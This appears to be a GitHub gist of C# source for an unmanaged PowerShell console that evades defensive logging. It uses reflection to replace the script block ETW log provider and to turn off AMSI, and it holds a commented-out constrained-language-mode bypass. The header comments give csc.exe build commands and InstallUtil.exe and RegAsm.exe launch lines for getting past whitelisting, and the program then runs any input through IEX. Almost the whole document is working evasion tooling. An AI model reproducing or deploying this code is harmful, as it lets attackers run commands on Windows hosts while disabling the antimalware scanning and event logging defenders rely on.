Instantly share code, notes, and snippets.

Embed
What would you like to do?
No Powershell with Transcript Logging Evasion & ScriptBlock Logging Evasion - eventid 4103,4104,4106
using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Security;
using System.Management.Automation.Runspaces;
using System.Reflection;
namespace TranscriptBypass
{
// Compiling with CSC.exe v4.0.30319 or v3.5
// C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Temp\posh.exe C:\Temp\posh.cs /reference:System.Management.Automation.dll
// C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /out:c:\temp\posh.exe C:\temp\posh.cs /reference:System.Management.Automation.dll
// Running via InstallUtil.exe
// C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\temp\posh.exe
// Compiling with CSC.exe v4.0.30319 or v3.5 for use with regasm.exe
// C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:C:\Temp\posh.dll C:\Temp\posh.cs /reference:System.Management.Automation.dll
// C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /target:library /out:c:\temp\posh.dll C:\temp\posh.cs /reference:System.Management.Automation.dll
// Running via RegAsm.exe
// C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U C:\temp\posh.dll
public class Program
{
public static Runspace newrunspace;
public static void startrunspace()
{
newrunspace = RunspaceFactory.CreateRunspace();
newrunspace.Open();
var cmd = new System.Management.Automation.PSVariable("c");
newrunspace.SessionStateProxy.PSVariable.Set(cmd);
var output = new System.Management.Automation.PSVariable("o");
newrunspace.SessionStateProxy.PSVariable.Set(output);
}
public static string InvokeAutomation(string cmd)
{
RunspaceInvoke scriptInvoker = new RunspaceInvoke(newrunspace);
Pipeline pipeline = newrunspace.CreatePipeline();
newrunspace.SessionStateProxy.SetVariable("c", cmd);
//disable scriptblock loging using reflection
//https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs
var psEtwLogProvider = newrunspace.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
if (psEtwLogProvider != null)
{
var etwProvider = psEtwLogProvider.GetField("etwProvider", BindingFlags.NonPublic | BindingFlags.Static);
var eventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
etwProvider.SetValue(null, eventProvider);
}
//disable amsi using reflection
//https://twitter.com/mattifestation/status/735261176745988096?lang=en
var amsi = newrunspace.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
var amsifield = amsi.GetField("amsiInitFailed", BindingFlags.NonPublic | BindingFlags.Static);
amsifield.SetValue(null, true);
//disable constrained mode
//var fi = typeof(SystemPolicy).GetField("systemLockdownPolicy", BindingFlags.NonPublic | BindingFlags.Static);
//fi.SetValue(null, SystemEnforcementMode.None);
if (cmd == "$a;")
{
return "";
}
else
{
pipeline.Commands.AddScript("$o = IEX $c | Out-String");
}
Collection<PSObject> results1 = pipeline.Invoke();
object results2 = newrunspace.SessionStateProxy.GetVariable("o");
return results2.ToString();
}
public static void Main()
{
try
{
startrunspace();
string ps = null;
Console.Write("PS>");
while (!String.IsNullOrEmpty(ps = "$a;" + Console.ReadLine().Trim()))
{
try
{
Console.WriteLine(InvokeAutomation(ps));
}
catch (Exception ex)
{
Console.Write(ex.Message);
}
Console.Write("PS>");
}
}
catch
{
Main();
}
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment